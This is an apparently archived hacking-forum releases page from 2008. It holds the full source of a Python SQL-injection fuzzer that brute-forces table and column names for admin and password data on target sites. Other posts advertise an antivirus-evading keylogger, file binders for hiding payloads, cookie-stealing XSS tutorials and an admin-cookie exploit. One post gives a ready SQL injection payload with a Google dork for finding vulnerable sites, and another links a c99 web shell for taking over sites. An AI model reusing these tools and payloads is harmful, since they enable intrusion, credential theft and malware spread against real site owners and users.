Progenic Navigation:

Releases - News - Top 100 - Forum


Releases:

SQL Table/Column Fuzzer ++video
sps codebase
Reh Team Keylogger v1.0 -95%UD
[video] Creating a File Binder In Visual Basic
Upnp Snooper 1.0
Hack Hound File Binder
[vid] Tut For Using Perl Exploits & Hacking Ibp2.4
Cookie Stealing With Xss
Hacking Video's
Online port scanner


Forum Member Links:

Pen - http://www.newstoolkit.com
proge - http://proge.net
G-Brain - http://www.g-brain.net
_Infernal_ - http://www.add-fun.net
Beezer - http://94octane.com
Anarchy Angel - http://hha.zapto.org
wax - http://www.progenic.com
-Evilthoutz- - http://deadly-hackers.org
TheDefaced - http://TheDefaced.org
Dajo77 - http://www.findmeahost.org

 




SQL Table/Column Fuzzer ++video

submitted by d3hydr8 on 5/6/2008


How to use this tool:
In this script you can test Tables, Columns or
Both.

For your site argument set TABLE,COLUMN or both for
which ever you want to test.
Example:
./d3sqlfuzz.py www.site.com/shop.php?id=-1+union+all+select+1,COLUMN,3+from+TABLE--

Add the errors you receive to the ERRORS array.

Add the tables you want tested to the tables
array and the columns to the columns array.

You also can add proxy support.

Source:
http://www.darkc0de.com/misc/d3sqlfuzz.py
Video:
http://www.darkc0de.com/tutorials/sql_darkc0de.zip

No indentation when using code blocks, download from the link above.

#!/usr/bin/python
#SQL Table/Column Fuzz

#How to use this tool:
#In this script you can test Tables, Columns or
#Both.
#
#For your site argument set TABLE,COLUMN or both for
#which ever you want to test.
#Example:
#./d3sqlfuzz.py www.site.com/shop.php?id=-1+union+all+select+1,COLUMN,3+from+TABLE--
#
#Add the errors you receive to the ERRORS array.
#
#Add the tables you want tested to the tables
#array and the columns to the columns array.
#
#You also can add proxy support.

#www.darkc0de.com
#d3hydr8[at]gmail[dot]com

#Fill in the error or errors your receiving here.
ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist"]
#Fill in the tables you want tested here.
tables = ["user","users","username","usernames","mysql.user","member","members","admin","administrator","administrators","login","logins","logon","userrights",
"superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator",
"tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers",
"sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm",
"userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","user_login","admin_user","admin_login","login_user","login_users","login_admin",
"login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news",
"table","tables","perdoruesit"]
#Fill in the columns you want tested here.
columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","user_password","name","id","user_pass","admin_user","admin_password",
"user_pass","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id",
"adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass",
"usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria",
"fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra",
"lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd",
"admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd",
"mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email"]
#Add proxy support: Format 127.0.0.1:8080
proxy = "None"

import urllib2, sys, re, httplib, socket

def fuzzer(i, x, y):
for i in x:
print "[+] Testing:",i
opener = urllib2.build_opener(proxy_handler)
source = opener.open(site.replace(y,i.replace("",""))).read()
e = [error for error in ERRORS if re.search(error, source)]
if len(e) == 0:
print "\t[!]",y.capitalize(),"Found:",i,""
#Uncomment to not test all array
#sys.exit(1)
else:
print "[-] Error Received:",e[0]

def bothfuzz():
for table in tables:
for column in columns:
print "[+] Table:",table,"Column:",column
table = table.replace("","")
column = column.replace("","")
opener = urllib2.build_opener(proxy_handler)
source = urllib2.urlopen(site.replace("TABLE",table).replace("COLUMN",column)).read()
e = [error for error in ERRORS if re.search(error, source)]
if len(e) == 0:
print "\t[!] Combo Found:",table,column,""
#Uncomment to not test all array
#sys.exit(1)
else:
print "[-] Error Received:",e[0]


if len(sys.argv) != 2:
print "\tUsage: ./d3sqlfuzz.py "
print "\tEx: ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--"
sys.exit(1)

print "\t d3hydr8[at]gmail[dot]com d3_SQLFuzz v1.1"
print "\t-----------------------------------------------"

site = sys.argv[1]
if site[:7] != "http://":
site = "http://"+site
if site.find("TABLE") == -1 and site.find("COLUMN") == -1:
print "[-] Site must contain COLUMN or TABLE"
sys.exit(1)

try:
if proxy != "None":
print "[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
print "[+] Building Handler"
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
else:
print "[-] Proxy Not Given"
proxy_handler = ""
except(socket.timeout):
print "[-] Proxy Timed Out"
sys.exit(1)
except:
print "[-] Proxy Failed"
sys.exit(1)

print "[+] Tables Loaded:",len(tables)
print "[+] Columns Loaded:",len(columns)
print "[+] Errors Loaded:",len(ERRORS)
if site.find("TABLE") != -1 and site.find("COLUMN") == -1:
print "[+] Fuzzing Tables"
fuzzer("table", tables, "TABLE")
if site.find("TABLE") == -1 and site.find("COLUMN") != -1:
print "[+] Fuzzing Columns"
fuzzer("column", columns, "COLUMN")
if site.find("TABLE") != -1 and site.find("COLUMN") != -1:
print "[+] Fuzzing Tables & Columns"
bothfuzz()
print "[-] Done"


Reply to this Entry




sps codebase

submitted by sunjester on 5/5/2008


SPS (sun programming solutions) has released a new codebase site. Check it out! If you have suggestions for new languages to add to the list reply here, the sps fourms or email sunjester at: tripmonster [at] gmail.com. currently we accept::


PHP
PL/SQL
Bash/Shellscript
Perl
HTMl
Javascript
Java
Visual Basic 6
Visual Basic .NET
C
C++
C#
ASP
Delphi
ASM
Ruby
Actionscript
Other

http://sunjester.freepgs.com/codebase/

6 replies, Read / Reply




Reh Team Keylogger v1.0 -95%UD

submitted by miezul on 4/25/2008


[size=18]Reh Team Keylogger v1.0 [/size]
[size=18]95% UD[/size] [size=18] Created By Miezul[/size]
EDIT:The site is Down we have some problems with the host.I will post the new link to the site.

The temporary link 2 the site is this: http://86.124.151.137/reh-team/index.php register and help us grow(we will post Rs accounts..etc)

##########
###Client###
##########

Size=72.0 KB
Images:
Spy:
Funny:
Hack:
-----------------------------------------------
##########
###Server### ---->>95% UD
##########

Size=28.0 KB
McAfee ----->>> VB-BackDoor.a.gen
-----------------------------------------------
Virus Scan: http://www.virustotal.com/ro/analisis/e5e985a78b92ead61e9845c861a81f70#


[size=18]Download:[/size]
1). http://www.sendspace.com/file/srl619
2). http://www.filefactory.com/file/0ea5f6
3). http://rapidshare.de/files/39160675/Reh_Team_Keylogger_v1.0.rar.html
4). http://rapidshare.com/files/108559933/Reh_Team_Keylogger_v1.0.rar

3 replies, Read / Reply




[video] Creating a File Binder In Visual Basic

submitted by steve10120 on 4/24/2008


Author: steve10120(me)
Website: http://hackhound.org
Description: 20 minute flash tutorial on how to make a simple file binder in visual basic. Used flash buttons so you can work at your own speed.

http://rapidshare.com/files/110044972/Binder_Tutorial.rar.html

Reply to this Entry




Upnp Snooper 1.0

submitted by Anarchy Angel on 4/14/2008


Upnp snooper will discover all upnp enabled devices or software in any LAN and returns the address of the xml file on the device that lists its upnp services.

NOTE: If you run this on a localhost "the computer your using now" be sure to use your lan address to connect to it i.e.

http://192.168.0.100/Upnp_Snoop1.php
-NOT-
http://127.0.0.1/Upnp_Snoop1.php

DOWNLOAD - More Info.

Reply to this Entry




Hack Hound File Binder

submitted by VioDoX on 4/13/2008


Hack Hound File Binder - H.H.F.B by steve10120

Hack Hound File Binder has many nice features, and is coded in Visual Basic 6. Some of the features are:

Extract to System, Temporary, and Windows
Bind Unlimited Files
Change Extraction Name
6kb Stub Size

I will be improving this binder as time goes, so stay tuned, and for more nice releases please visit:

www.hackhound.com

Link:

http://hackhound.com/downloads/H.H.F.B.rar

4 replies, Read / Reply




[vid] Tut For Using Perl Exploits & Hacking Ibp2.4

submitted by NikTrix on 4/11/2008


we are hacking cookies of user id 1 . or u can say admin biggrin.gif

well this works on every ibp forums which have ibparcade 3.3 installed

used exploit :
http://www.milw0rm.com/exploits/5018


made by me biggrin.gif

see and learn just 7.50 mb


http://palwal.biz/vid/hackibp.rar


All comments are welcome

serious about hacking join us http://niktrix.info

18 replies, Read / Reply




Cookie Stealing With Xss

submitted by NikTrix on 4/11/2008


http://www.mediafire.com/?moxmbn11zdm

pass is satanicNTian

Join me here if you want to Learn Hacking http://niktrix.info

Reply to this Entry




Hacking Video's

submitted by NikTrix on 4/7/2008


[video] Bypass Sites Protected Area w/o Login in
Learn How u can enter various sites as guests and even access those areas
Which are meant for only members

http://palwal.biz/vid/bot.rar

(video)Hacking Photo Gallary sites For admin panel
http://palwal.biz/vid/admin.rar

[Vid Tut]hacking Websites -- >> For Usernameasse
Google Dork : We Used In this
allinurl:"showCat.php?cat_id"


Sql Injection To be Used

-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*


Lets take a look on video

http://palwal.biz/vid/class.rar

Video tut on Hacking Websites through Remote Link
Hello
I am here wid a new video teaching u all how to hack a website wid remote exploit.

You need a c99 shell for it .

http://msn10000.altervista.org/c99.txt

copy it in a notepad and save it as c99.html or htm

Rest u will understand by video

http://palwal.biz/vid/hacking.rar

If u have any probs feel free to ask ..

I really tried to explain it in a simpler way .


These all video's are made by me .

If u all wanna learn hacking join me at niktrix.info

Reply to this Entry




Online port scanner

submitted by Anarchy Angel on 4/5/2008


I put a online port scanner up and its ready for use. Due to the fact the port scanning can eat up a lot of band width the scanner only probes ports 21, 22, 25, 43, 53, 79, 80, 110, 139, 443, 3389, 9001, and one custom port. Later i will put the source up for download.

Give it a try @ http://hha.zapto.org

4 replies, Read / Reply